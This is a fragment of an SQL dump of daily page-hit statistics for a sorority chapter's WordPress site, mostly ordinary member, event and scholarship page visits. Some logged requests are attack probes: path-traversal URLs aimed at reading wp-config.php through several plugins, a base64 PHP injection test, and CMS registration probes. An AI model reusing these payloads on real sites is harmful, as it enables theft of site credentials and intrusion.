ava-lawson/','2017-02-06',1,872),('/ts_teams/quiyatta-gardner/','2017-02-06',1,876),('/ts_teams/celia-worrell/','2017-02-06',1,860),('/ts_teams/christy-lewis/','2017-02-06',1,818),('/members/?//connect.facebook.net/en_US/sdk.js','2017-02-06',1,553),('/ts_teams/linda-price/','2017-02-06',1,867),('/ts_teams/tracy-irvin/','2017-02-06',1,815),('/ts_teams/gloria-sanders/','2017-02-06',2,865),('/ts_teams/kalima-alawode/','2017-02-06',1,888),('/ts_teams/maya-franklin/','2017-02-06',1,878),('/ts_teams/dawn-j-kemp/','2017-02-06',1,817),('/membership/?//connect.facebook.net/en_US/sdk.js','2017-02-06',1,576),('/membership/?//connect_facebook_net/en_US/sdk_js','2017-02-06',1,576),('/ts_teams/patreece-carter/?//connect.facebook.net/en_US/sdk.js','2017-02-06',1,885),('/appa','2017-02-06',2,781),('/appa/','2017-02-06',2,781),('/ts_teams/crystal-whitaker/?//connect.facebook.net/en_US/sdk.js','2017-02-06',1,816),('/ts_teams/kristin-clark/?//connect.facebook.net/en_US/sdk.js','2017-02-06',1,883),('/event/a-pretty-polished-affair/?//connect.facebook.net/en_US/sdk.js','2017-02-06',1,485),('/scholarship/application/?//connect.facebook.net/en_US/sdk.js','2017-02-06',1,804),('/ts_teams/w-ruth-conway/?//connect.facebook.net/en_US/sdk.js','2017-02-06',1,881),('/bog','2017-02-06',1,772),('/bog/','2017-02-06',1,772),('/ts_teams/linda-brigmon/?//connect.facebook.net/en_US/sdk.js','2017-02-06',1,886),('/ts_slider/567/','2017-02-06',1,567),('/scholarship/?//connect.facebook.net/en_US/sdk.js','2017-02-06',1,797),('/zen','2017-02-06',1,786),('/zen/','2017-02-06',1,786),('/scholarship','2017-02-06',2,797),('/ts_teams/lillet-williams/','2017-02-06',1,823),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-02-06',1,689),('/appa/?//connect.facebook.net/en_US/sdk.js','2017-02-06',1,781),('/','2017-02-07',19,6),('/membership/','2017-02-07',3,576),('/?option=com_users&view=profile&layout=edit','2017-02-07',1,6),('/index.php?option=com_users&view=registration','2017-02-07',2,6),('/?option=com_users&view=registration','2017-02-07',2,6),('/index.php?option=com_user&view=register','2017-02-07',1,6),('/?option=com_user&view=register','2017-02-07',1,6),('/user/?task=register','2017-02-07',1,547),('/index.php?option=com_easyblog&view=dashboard&layout=write','2017-02-07',1,6),('/?option=com_easyblog&view=dashboard&layout=write','2017-02-07',1,6),('/members/?SystemId','2017-02-07',1,553),('/members/','2017-02-07',6,553),('/event/a-pretty-polished-affair/','2017-02-07',1,485),('/event/4th-annual-denim-pearlz-party/','2017-02-07',6,842),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-02-07',1,657),('/scholarship','2017-02-07',4,797),('/scholarship/','2017-02-07',11,797),('/scholarship/application/','2017-02-07',1,804),('/history/','2017-02-07',1,190),('/','2017-02-08',13,6),('/programs','2017-02-08',1,247),('/programs/','2017-02-08',1,247),('/scholarship/','2017-02-08',2,797),('/event/4th-annual-denim-pearlz-party/','2017-02-08',1,842),('/event/a-pretty-polished-affair/','2017-02-08',1,485),('/','2017-02-09',13,6),('/members/','2017-02-09',5,553),('/event/a-pretty-polished-affair/','2017-02-09',2,485),('/programs/','2017-02-09',1,247),('/login','2017-02-09',1,549),('/login/','2017-02-09',1,549),('/login/feed/','2017-02-09',1,549),('/membership/','2017-02-09',2,576),('/event/4th-annual-denim-pearlz-party/','2017-02-09',2,842),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-09',2,956),('/lgz-celebrates-35-years-service-howard-county-md/feed/','2017-02-09',1,956),('/scholarship/','2017-02-09',1,797),('/history/','2017-02-09',1,190),('/ts_teams/tamika-r-daniels/','2017-02-09',1,814),('/ts_teams/michele-franklin/','2017-02-09',1,877),('/ts_teams/tamara-curtis/','2017-02-09',1,821),('/ts_teams/angela-jefferson/','2017-02-09',1,874),('/ts_teams/gloria-sanders/','2017-02-09',1,865),('/ts_teams/kathy-j-barrett/','2017-02-09',1,819),('/ts_teams/lillet-williams/','2017-02-09',1,823),('/ts_teams/w-ruth-conway/','2017-02-09',1,881),('/ts_teams/kalima-alawode/','2017-02-09',1,888),('/download/aarc/','2017-02-09',1,991),('/ts_teams/quiyatta-gardner/','2017-02-09',1,876),('/ts_teams/helen-newman/','2017-02-09',1,868),('/ts_teams/patreece-carter/','2017-02-09',1,885),('/ts_teams/rosee-ragin/','2017-02-09',1,866),('/ts_teams/sandra-hudson/','2017-02-09',1,875),('/ts_teams/crystal-whitaker/','2017-02-09',1,816),('/ts_teams/cherice-daniel-2/','2017-02-09',1,825),('/members/feed/','2017-02-09',1,553),('/scholarship/application/','2017-02-09',1,804),('/','2017-02-10',26,6),('/members/','2017-02-10',4,553),('/scholarship/','2017-02-10',2,797),('/event/4th-annual-denim-pearlz-party/','2017-02-10',8,842),('/zen/','2017-02-10',7,786),('/history/','2017-02-10',1,190),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-11',6,956),('/lgz-celebrates-35-years-service-howard-county-md/?comment=Pretty%21%20This%20has%20been%20an%20extremely%20wonderful%20article.%0D%0AThanks%20for%20supplying%20this%20info.&author=cheap-rx.com%20legit&email=shad_cummings%40yahoo.de&url=https%3A%2F%2Fwww.','2017-02-11',1,956),('/','2017-02-11',25,6),('/history/','2017-02-11',4,190),('/members/','2017-02-11',4,553),('/programs/','2017-02-11',3,247),('/scholarship/','2017-02-11',1,797),('/event/4th-annual-denim-pearlz-party/','2017-02-11',2,842),('/event/a-pretty-polished-affair/','2017-02-11',1,485),('/login','2017-02-11',1,549),('/login/','2017-02-11',1,549),('/ts_teams/cherice-daniel-2/','2017-02-11',1,825),('/ts_teams/rose-matthews/','2017-02-11',1,870),('/bog','2017-02-11',1,772),('/bog/','2017-02-11',1,772),('/','2017-02-12',16,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-12',4,956),('/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-02-12',1,6),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-02-12',1,6),('/event/4th-annual-denim-pearlz-party/','2017-02-12',2,842),('/appa/','2017-02-12',1,781),('/','2017-02-13',23,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-13',1,956),('/members/','2017-02-13',2,553),('/event/4th-annual-denim-pearlz-party/','2017-02-13',6,842),('/youth/','2017-02-13',1,738),('/ts_teams/dawn-j-kemp/','2017-02-13',3,817),('/history/','2017-02-13',1,190),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F%3Fno_cache_yzfNB5EF%3D1487048343&reauth=1','2017-02-13',1,657),('/','2017-02-14',34,6),('/event/4th-annual-denim-pearlz-party/','2017-02-14',8,842),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-14',29,956),('/user','2017-02-14',1,547),('/user/','2017-02-14',1,547),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-02-14',3,657),('/download/constitution-by-laws/','2017-02-14',1,989),('/scholarship/','2017-02-14',4,797),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F%3Fno_cache_2ciJswxT%3D1487091599&reauth=1','2017-02-14',1,657),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F%3Fno_cache_aAzXqePm%3D1487094109&reauth=1','2017-02-14',1,657),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F%3Fno_cache_DRpfqgBj%3D1487094147&reauth=1','2017-02-14',1,657),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F%3Fno_cache_Y5UtlFSp%3D1487094182&reauth=1','2017-02-14',1,657),('/scholarship/application/','2017-02-14',3,804),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F%3Fno_cache_O1CiSfrG%3D1487101374&reauth=1','2017-02-14',1,657),('/login','2017-02-14',1,549),('/login/','2017-02-14',1,549),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F%3Fno_cache_97p6JBik%3D1487109210&reauth=1','2017-02-14',1,657),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F%3Fno_cache_Rdj5O109%3D1487110093&reauth=1','2017-02-14',1,657),('/ts_teams/rosee-ragin/','2017-02-14',1,866),('/members/','2017-02-14',1,553),('/programs/','2017-02-14',1,247),('/','2017-02-15',16,6),('/scholarship/','2017-02-15',1,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-15',5,956),('/?a=c','2017-02-15',2,6),('/history/','2017-02-15',1,190),('/event/4th-annual-denim-pearlz-party/','2017-02-15',3,842),('/appa','2017-02-15',1,781),('/appa/','2017-02-15',1,781),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-16',11,956),('/','2017-02-16',29,6),('/event/4th-annual-denim-pearlz-party/','2017-02-16',10,842),('/scholarship/','2017-02-16',5,797),('/?login=cmd','2017-02-16',2,6),('/history/','2017-02-16',2,190),('/members/','2017-02-16',2,553),('/programs/','2017-02-16',2,247),('/login','2017-02-16',1,549),('/login/','2017-02-16',1,549),('/','2017-02-17',34,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-17',6,956),('/members/','2017-02-17',7,553),('/event/4th-annual-denim-pearlz-party/','2017-02-17',9,842),('/ts_teams/dawn-j-kemp/','2017-02-17',1,817),('/history/','2017-02-17',2,190),('/scholarship/','2017-02-17',2,797),('/login','2017-02-17',2,549),('/login/','2017-02-17',4,549),('/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-02-17',1,6),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-02-17',1,6),('/programs/','2017-02-17',1,247),('/membership/','2017-02-17',2,576),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-18',6,956),('/','2017-02-18',44,6),('/membership/','2017-02-18',2,576),('/event/4th-annual-denim-pearlz-party/','2017-02-18',9,842),('/scholarship/','2017-02-18',6,797),('/scholarship/application/','2017-02-18',1,804),('/members/','2017-02-18',5,553),('/history/','2017-02-18',3,190),('/programs/','2017-02-18',5,247),('/login','2017-02-18',2,549),('/login/','2017-02-18',3,549),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-02-18',1,657),('/event/a-pretty-polished-affair/','2017-02-18',2,485),('/','2017-02-19',17,6),('/membership/','2017-02-19',1,576),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-02-19',1,657),('/history/','2017-02-19',5,190),('/index.php?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk=','2017-02-19',2,6),('/?array=cHJpbnQoJzcwODQ3NGZnNjVhMDE4NTQzbzcxYzZhNzQ5Y2M0OGUzJyk%3D','2017-02-19',2,6),('/scholarship','2017-02-19',2,797),('/scholarship/','2017-02-19',5,797),('/scholarship/application/','2017-02-19',2,804),('/programs/','2017-02-19',6,247),('/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-02-19',1,6),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-02-19',1,6),('/event/4th-annual-denim-pearlz-party/','2017-02-19',4,842),('/members/','2017-02-19',3,553),('/event/a-pretty-polished-affair/','2017-02-19',1,485),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-19',1,956),('/login','2017-02-19',1,549),('/login/','2017-02-19',1,549),('/ts_teams/cherice-daniel-2/','2017-02-19',1,825),('/ts_teams/lillet-williams-2/','2017-02-19',1,824),('/ts_teams/lillet-williams/','2017-02-19',1,823),('/ts_teams/constance-kinder/','2017-02-19',1,822),('/ts_teams/tamara-curtis/','2017-02-19',1,821),('/ts_teams/shanee-satchell/','2017-02-19',1,820),('/ts_teams/kathy-j-barrett/','2017-02-19',1,819),('/ts_teams/christy-lewis/','2017-02-19',1,818),('/ts_teams/dawn-j-kemp/','2017-02-19',1,817),('/ts_teams/crystal-whitaker/','2017-02-19',1,816),('/ts_teams/tracy-irvin/','2017-02-19',1,815),('/programs/','2017-02-20',4,247),('/scholarship/','2017-02-20',8,797),('/scholarship/application/','2017-02-20',6,804),('/','2017-02-20',51,6),('/youth','2017-02-20',1,738),('/youth/','2017-02-20',1,738),('/members/','2017-02-20',3,553),('/login','2017-02-20',1,549),('/login/','2017-02-20',1,549),('/event/4th-annual-denim-pearlz-party/','2017-02-20',10,842),('/scholarship','2017-02-20',2,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-20',4,956),('/lgz-celebrates-35-years-service-howard-county-md','2017-02-20',1,956),('/','2017-02-21',27,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Ftools.php%3Fpage%3Dbackup_manager%26download_backup_file%3DoldBackups%2F..%2F..%2Fwp-config.php&reauth=1','2017-02-21',2,657),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Fadmin.php%3Fpage%3Dmiwoftp%26option%3Dcom_miwoftp%26action%3Ddownload%26dir%3D%2F%26item%3Dwp-config.php%26order%3Dname%26srt%3Dyes&reauth=1','2017-02-21',1,657),('/history','2017-02-21',1,190),('/history/','2017-02-21',2,190),('/members','2017-02-21',1,553),('/members/','2017-02-21',1,553),('/scholarship','2017-02-21',2,797),('/scholarship/','2017-02-21',11,797),('/scholarship/application/','2017-02-21',4,804),('/programs/','2017-02-21',1,247),('/?page-test','2017-02-21',1,6),('/event/4th-annual-denim-pearlz-party/','2017-02-21',7,842),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-21',5,956),('/event/a-pretty-polished-affair/','2017-02-21',5,485),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-02-21',1,657),('/zen/','2017-02-21',3,786),('/','2017-02-22',30,6),('/event/4th-annual-denim-pearlz-party/','2017-02-22',8,842),('/scholarship/','2017-02-22',6,797),('/event/breakfast-on-the-go/','2017-02-22',2,493),('/scholarship/application/','2017-02-22',1,804),('/history/','2017-02-22',5,190),('/programs/','2017-02-22',3,247),('/members/','2017-02-22',4,553),('/scholarship','2017-02-22',1,797),('/appa','2017-02-22',1,781),('/appa/','2017-02-22',1,781),('/youth','2017-02-22',1,738),('/youth/','2017-02-22',1,738),('/ts_teams/cherice-daniel-2/','2017-02-22',2,825),('/history/','2017-02-23',3,190),('/members/','2017-02-23',3,553),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Ftools.php%3Fpage%3Dbackup_manager%26download_backup_file%3D..%2Fwp-config.php&reauth=1','2017-02-23',1,657),('/','2017-02-23',49,6),('/event/4th-annual-denim-pearlz-party/','2017-02-23',9,842),('/scholarship/','2017-02-23',8,797),('/scholarship/application/','2017-02-23',5,804),('/event/a-pretty-polished-affair/','2017-02-23',1,485),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-23',1,956),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-02-23',1,657),('/event/black-history-expo-2017/','2017-02-23',1,1003),('/','2017-02-24',55,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Fadmin.php%3Fpage%3Dmiwoftp%26option%3Dcom_miwoftp%26action%3Ddownload%26item%3Dwp-config.php%26order%3Dname%26srt%3Dyes&reauth=1','2017-02-24',1,657),('/history/','2017-02-24',6,190),('/members/','2017-02-24',4,553),('/programs/','2017-02-24',2,247),('/scholarship/','2017-02-24',8,797),('/event/4th-annual-denim-pearlz-party/','2017-02-24',13,842),('/history','2017-02-24',2,190),('/members','2017-02-24',2,553),('/event/black-history-expo-2017/','2017-02-24',1,1003),('/scholarship/application/','2017-02-24',2,804),('/','2017-02-25',68,6),('/event/a-pretty-polished-affair/','2017-02-25',2,485),('/event/4th-annual-denim-pearlz-party/','2017-02-25',31,842),('/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php','2017-02-25',1,6),('/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php','2017-02-25',1,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Fadmin.php%3Fpage%3Dmiwoftp%26option%3Dcom_miwoftp%26action%3Ddownload%26item%3Dwp-config.php%26order%3Dname%26srt%3Dyes&reauth=1','2017-02-25',1,657),('/event/black-history-expo-2017/','2017-02-25',6,1003),('/programs/','2017-02-25',3,247),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Fadmin.php%3Fpage%3Dmiwoftp%26option%3Dcom_miwoftp%26action%3Ddownload%26item%3D..%2Fwp-config.php%26order%3Dname%26srt%3Dyes&reauth=1','2017-02-25',1,657),('/scholarship/','2017-02-25',2,797),('/history/','2017-02-25',1,190),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-25',1,956),('/members/','2017-02-25',1,553),('/ts_teams/dawn-j-kemp/','2017-02-25',1,817),('/','2017-02-26',38,6),('/event/4th-annual-denim-pearlz-party/','2017-02-26',1,842),('/scholarship/','2017-02-26',5,797),('/scholarship/application/','2017-02-26',4,804),('/scholarship','2017-02-26',1,797),('/members/','2017-02-26',5,553),('/history/','2017-02-26',1,190),('/ts_teams/kathy-j-barrett/','2017-02-26',1,819),('/','2017-02-27',31,6),('/scholarship/application/','2017-02-27',9,804),('/programs/','2017-02-27',5,247),('/history/','2017-02-27',1,190),('/members/','2017-02-27',5,553),('/scholarship/','2017-02-27',21,797),('/event/a-pretty-polished-affair/','2017-02-27',1,485),('/event/breakfast-on-the-go/','2017-02-27',1,493),('/event/march-dimes-march-babies/','2017-02-27',1,1007),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-27',2,956),('/login','2017-02-27',1,549),('/ts_teams/cherice-daniel-2/','2017-02-27',1,825),('/ts_teams/lillet-williams-2/','2017-02-27',1,824),('/ts_teams/lillet-williams/','2017-02-27',1,823),('/ts_teams/constance-kinder/','2017-02-27',1,822),('/ts_teams/tamara-curtis/','2017-02-27',1,821),('/ts_teams/shanee-satchell/','2017-02-27',1,820),('/ts_teams/kathy-j-barrett/','2017-02-27',1,819),('/ts_teams/christy-lewis/','2017-02-27',1,818),('/ts_teams/dawn-j-kemp/','2017-02-27',1,817),('/ts_teams/crystal-whitaker/','2017-02-27',1,816),('/ts_teams/tracy-irvin/','2017-02-27',1,815),('/ts_teams/tamika-r-daniels/','2017-02-27',1,814),('/ts_teams/kalima-alawode/','2017-02-27',1,888),('/ts_teams/kathy-ball/','2017-02-27',1,887),('/ts_teams/linda-brigmon/','2017-02-27',1,886),('/ts_teams/patreece-carter/','2017-02-27',1,885),('/ts_teams/kristin-clark/','2017-02-27',1,883),('/ts_teams/ebony-cogdell/','2017-02-27',1,882),('/ts_teams/w-ruth-conway/','2017-02-27',1,881),('/ts_teams/cassandra-dorsey/','2017-02-27',1,880),('/ts_teams/maya-franklin/','2017-02-27',1,878),('/ts_teams/michele-franklin/','2017-02-27',1,877),('/ts_teams/quiyatta-gardner/','2017-02-27',1,876),('/ts_teams/sandra-hudson/','2017-02-27',1,875),('/ts_teams/angela-jefferson/','2017-02-27',1,874),('/ts_teams/ava-lawson/','2017-02-27',1,872),('/ts_teams/rose-matthews/','2017-02-27',1,870),('/ts_teams/helen-newman/','2017-02-27',1,868),('/ts_teams/linda-price/','2017-02-27',1,867),('/ts_teams/rosee-ragin/','2017-02-27',1,866),('/ts_teams/gloria-sanders/','2017-02-27',1,865),('/ts_teams/jontue-sumler/','2017-02-27',1,862),('/ts_teams/celia-worrell/','2017-02-27',1,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-02-27',1,828),('/login/','2017-02-27',1,549),('/download/aarc/','2017-02-27',1,991),('/download/constitution-by-laws/','2017-02-27',1,989),('/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-02-27',1,6),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-02-27',1,6),('/zen/','2017-02-27',3,786),('/scholarship','2017-02-27',3,797),('/','2017-02-28',22,6),('/members/','2017-02-28',6,553),('/lgz-celebrates-35-years-service-howard-county-md/','2017-02-28',1,956),('/lgz-celebrates-35-years-service-howard-county-md/feed/','2017-02-28',1,956),('/scholarship/','2017-02-28',10,797),('/event/a-pretty-polished-affair/','2017-02-28',3,485),('/scholarship/application/','2017-02-28',10,804),('/','2017-03-01',37,6),('/scholarship/','2017-03-01',27,797),('/event/breakfast-on-the-go/','2017-03-01',2,493),('/scholarship/application/','2017-03-01',13,804),('/event/march-dimes-march-babies/','2017-03-01',1,1007),('/ts_teams/shanee-satchell/','2017-03-01',1,820),('/programs/','2017-03-01',2,247),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-01',1,956),('/login','2017-03-01',1,549),('/login/','2017-03-01',1,549),('/scholarship','2017-03-01',1,797),('/history/','2017-03-01',1,190),('/','2017-03-02',25,6),('/scholarship/','2017-03-02',12,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-02',5,956),('/scholarship/application/','2017-03-02',1,804),('/members/','2017-03-02',3,553),('/ts_teams/jontue-sumler/','2017-03-02',1,862),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-03-03',1,657),('/','2017-03-03',13,6),('/history','2017-03-03',1,190),('/history/','2017-03-03',1,190),('/scholarship/','2017-03-03',12,797),('/scholarship/application/','2017-03-03',2,804),('/scholarship','2017-03-03',6,797),('/programs/','2017-03-03',2,247),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-03',1,956),('/members/','2017-03-03',3,553),('/event/breakfast-on-the-go/','2017-03-03',2,493),('/','2017-03-04',35,6),('/scholarship/','2017-03-04',6,797),('/programs/','2017-03-04',2,247),('/appa','2017-03-04',1,781),('/appa/','2017-03-04',1,781),('/members/','2017-03-04',5,553),('/history/','2017-03-04',2,190),('/event/a-pretty-polished-affair/','2017-03-04',1,485),('/login','2017-03-04',1,549),('/login/','2017-03-04',1,549),('/scholarship/application/','2017-03-04',2,804),('/ts_teams/kathy-ball/','2017-03-04',1,887),('/','2017-03-05',29,6),('/scholarship/','2017-03-05',11,797),('/scholarship/application/','2017-03-05',8,804),('/login','2017-03-05',5,549),('/login/','2017-03-05',7,549),('/scholarship','2017-03-05',1,797),('/event/a-pretty-polished-affair/','2017-03-05',2,485),('/appa/','2017-03-05',1,781),('/programs/','2017-03-05',2,247),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-03-05',1,657),('/members/','2017-03-05',6,553),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-05',1,956),('/history/','2017-03-05',1,190),('/event/breakfast-on-the-go/','2017-03-05',1,493),('/event/march-dimes-march-babies/','2017-03-05',1,1007),('/','2017-03-06',27,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-06',1,956),('/login','2017-03-06',2,549),('/scholarship/','2017-03-06',17,797),('/members/','2017-03-06',1,553),('/event/march-dimes-march-babies/','2017-03-06',1,1007),('/event/a-pretty-polished-affair/','2017-03-06',2,485),('/programs/','2017-03-06',6,247),('/event/breakfast-on-the-go/','2017-03-06',1,493),('/history/','2017-03-06',1,190),('/login/','2017-03-06',2,549),('/ts_teams/helen-newman/','2017-03-06',1,868),('/appa','2017-03-06',1,781),('/appa/','2017-03-06',2,781),('/youth','2017-03-06',1,738),('/youth/','2017-03-06',1,738),('/bog','2017-03-06',1,772),('/bog/','2017-03-06',1,772),('/scholarship/application/','2017-03-06',8,804),('/scholarship','2017-03-06',2,797),('/ts_teams/shanee-satchell/','2017-03-06',1,820),('/scholarship/','2017-03-07',16,797),('/scholarship/application/','2017-03-07',13,804),('/','2017-03-07',16,6),('/ts_teams/gloria-sanders','2017-03-07',1,865),('/ts_teams/gloria-sanders/','2017-03-07',1,865),('/event/a-pretty-polished-affair/','2017-03-07',1,485),('/history/','2017-03-07',1,190),('/event/march-dimes-march-babies/','2017-03-07',1,1007),('/cause/scholarship/','2017-03-07',3,59),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-03-07',1,657),('/scholarship','2017-03-07',1,797),('/','2017-03-08',25,6),('/history/','2017-03-08',1,190),('/scholarship/','2017-03-08',13,797),('/login','2017-03-08',2,549),('/login/','2017-03-08',2,549),('/scholarship','2017-03-08',2,797),('/scholarship/application/','2017-03-08',6,804),('/members/','2017-03-08',1,553),('/ts_teams/dawn-j-kemp/','2017-03-08',1,817),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-09',1,956),('/','2017-03-09',18,6),('/scholarship/','2017-03-09',2,797),('/scholarship/application/','2017-03-09',2,804),('/ts_teams/dawn-j-kemp/','2017-03-09',1,817),('/history/','2017-03-09',1,190),('/members/','2017-03-09',1,553),('/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-03-09',1,6),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-03-09',1,6),('/ts_teams/rose-matthews/','2017-03-09',1,870),('/','2017-03-10',19,6),('/members/','2017-03-10',1,553),('/?q=user/','2017-03-10',1,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-03-10',1,657),('/scholarship/','2017-03-10',3,797),('/scholarship/application/','2017-03-10',3,804),('/membership/','2017-03-10',1,576),('/event/a-pretty-polished-affair/','2017-03-10',1,485),('/appa/','2017-03-10',1,781),('/','2017-03-11',23,6),('/login','2017-03-11',5,549),('/login/','2017-03-11',6,549),('/members/','2017-03-11',2,553),('/programs/','2017-03-11',3,247),('/event/march-dimes-march-babies/','2017-03-11',1,1007),('/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-03-11',1,6),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-03-11',1,6),('/scholarship/','2017-03-11',4,797),('/ts_teams/helen-newman/','2017-03-11',1,868),('/ts_teams/rosee-ragin/','2017-03-11',1,866),('/ts_teams/patreece-carter/','2017-03-11',1,885),('/ts_teams/michele-franklin/','2017-03-11',1,877),('/ts_teams/tamara-curtis/','2017-03-11',1,821),('/ts_teams/lillet-williams-2/','2017-03-11',1,824),('/ts_teams/kathy-ball/','2017-03-11',1,887),('/ts_teams/w-ruth-conway/','2017-03-11',1,881),('/ts_teams/jeaneathia-yerby-crowder/','2017-03-11',1,828),('/ts_teams/gloria-sanders/','2017-03-11',1,865),('/ts_teams/linda-price/','2017-03-11',1,867),('/ts_teams/rose-matthews/','2017-03-11',1,870),('/ts_teams/angela-jefferson/','2017-03-11',1,874),('/history/','2017-03-11',1,190),('/ts_teams/ava-lawson/','2017-03-11',1,872),('/ts_teams/crystal-whitaker/','2017-03-11',1,816),('/ts_teams/kathy-j-barrett/','2017-03-11',1,819),('/ts_teams/kristin-clark/','2017-03-11',1,883),('/ts_teams/tracy-irvin/','2017-03-11',1,815),('/ts_teams/lillet-williams/','2017-03-11',1,823),('/event/ms-walk-2017/','2017-03-11',1,1020),('/ts_teams/shanee-satchell/','2017-03-11',1,820),('/ts_teams/cherice-daniel-2/','2017-03-11',1,825),('/ts_teams/christy-lewis/','2017-03-11',1,818),('/ts_teams/sandra-hudson/','2017-03-11',1,875),('/ts_teams/constance-kinder/','2017-03-11',1,822),('/event/breakfast-on-the-go/','2017-03-11',1,493),('/scholarship/application/','2017-03-11',1,804),('/','2017-03-12',18,6),('/members/','2017-03-12',1,553),('/scholarship/','2017-03-12',6,797),('/ts_teams/linda-brigmon/','2017-03-12',1,886),('/scholarship/application/','2017-03-12',2,804),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-03-12',1,657),('/ts_teams/shanee-satchell/','2017-03-12',1,820),('/','2017-03-13',24,6),('/user','2017-03-13',1,547),('/user/','2017-03-13',1,547),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-03-13',1,657),('/login/','2017-03-13',3,549),('/history/','2017-03-13',1,190),('/members/','2017-03-13',2,553),('/programs/','2017-03-13',2,247),('/scholarship/','2017-03-13',5,797),('/event/ms-walk-2017/','2017-03-13',1,1020),('/event/breakfast-on-the-go/','2017-03-13',1,493),('/event/march-dimes-march-babies/','2017-03-13',1,1007),('/lgz-celebrates-35-years-service-howard-county-md/','2017-03-13',1,956),('/login','2017-03-13',2,549),('/ts_teams/cherice-daniel-2/','2017-03-13',1,825),('/ts_teams/lillet-williams-2/','2017-03-13',1,824),('/ts_teams/lillet-williams/','2017-03-13',1,823),('/ts_teams/constance-kinder/','2017-03-13',1,822),('/ts_teams/tamara-curtis/','2017-03-13',1,821),('/ts_teams/shanee-satchell/','2017-03-13',1,820),('/ts_teams/kathy-j-barrett/','2017-03-13',1,819),('/ts_teams/christy-lewis/','2017-03-13',1,818),('/ts_teams/dawn-j-kemp/','2017-03-13',1,817),('/ts_teams/crystal-whitaker/','2017-03-13',1,816),('/ts_teams/tracy-irvin/','2017-03-13',1,815),('/ts_teams/tamika-r-daniels/','2017-03-13',1,814),('/ts_teams/kalima-alawode/','2017-03-13',1,888),('/ts_teams/kathy-ball/','2017-03-13',1,887),('/ts_teams/linda-brigmon/','2017-03-13',1,886),('/ts_teams/patreece-carter/','2017-03-13',1,885),('/ts_teams/kristin-clark/',